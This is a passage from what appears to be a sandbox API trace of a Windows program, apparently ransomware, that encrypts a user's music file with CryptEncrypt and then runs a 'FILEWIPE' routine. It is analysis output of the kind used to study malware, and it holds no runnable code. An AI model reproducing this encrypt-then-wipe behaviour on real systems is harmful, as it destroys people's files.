| out: lpMsg=0x6ae83c) returned 0 [0037.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0037.220] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0037.220] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.220] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0037.220] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.220] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.220] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.220] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0037.220] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.220] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da218, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da218*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0037.220] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.220] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.220] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.220] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.220] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.220] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.220] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.221] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.221] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.221] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.221] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.221] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.221] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.221] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.221] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.221] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.221] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.221] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.221] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.221] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.221] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.221] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.221] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.221] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.221] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.221] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x1143, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x1150) returned 1 [0037.221] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.221] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.222] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.222] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.222] CharLowerBuffW (in: lpsz="byte[4433]", cchLength=0xa | out: lpsz="byte[4433]") returned 0xa [0037.222] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.222] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.222] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.222] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.222] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.222] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xac22b8*, pdwDataLen=0x6ae220*=0x1143, dwBufLen=0x1150 | out: pbData=0xac22b8*, pdwDataLen=0x6ae220*=0x1150) returned 1 [0037.222] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.222] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.222] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.222] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.222] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.222] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.222] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.222] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.222] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.222] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.223] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.223] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.223] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.223] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.223] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.223] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.223] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.223] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.223] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.223] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.224] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.224] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.224] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0037.224] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.224] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.224] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0037.224] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.224] CryptDestroyKey (hKey=0x7c2280) returned 1 [0037.224] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.224] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.224] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.224] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.224] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.225] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0037.225] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0037.225] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.225] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.225] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0037.225] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.225] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.225] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.225] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.225] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.225] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.225] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.225] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.225] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.225] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.225] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.225] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.225] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0037.225] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.225] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.225] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.226] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.226] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.226] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.226] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0037.226] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.226] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.226] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.226] FreeLibrary (hLibModule=0x754b0000) returned 1 [0037.226] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.226] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.226] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.227] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.227] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.227] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.227] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0037.227] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.228] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.228] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49f11b00, ftCreationTime.dwHighDateTime=0x1d5c549, ftLastAccessTime.dwLowDateTime=0x61550420, ftLastAccessTime.dwHighDateTime=0x1d5c100, ftLastWriteTime.dwLowDateTime=0x61550420, ftLastWriteTime.dwHighDateTime=0x1d5c100, nFileSizeHigh=0x0, nFileSizeLow=0x1143, dwReserved0=0x0, dwReserved1=0x777648, cFileName="0_h8M557-V1.mp3", cAlternateFileName="0_H8M5~1.MP3")) returned 0x7c2240 [0037.228] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0037.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0037.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0037.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.228] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.228] CharLowerBuffW (in: lpsz="byte[4419]", cchLength=0xa | out: lpsz="byte[4419]") returned 0xa [0037.228] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.228] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0037.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.228] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.228] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0037.229] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0037.229] FreeLibrary (hLibModule=0x76b40000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0037.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.229] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.230] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.230] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.230] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0037.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.230] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.230] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 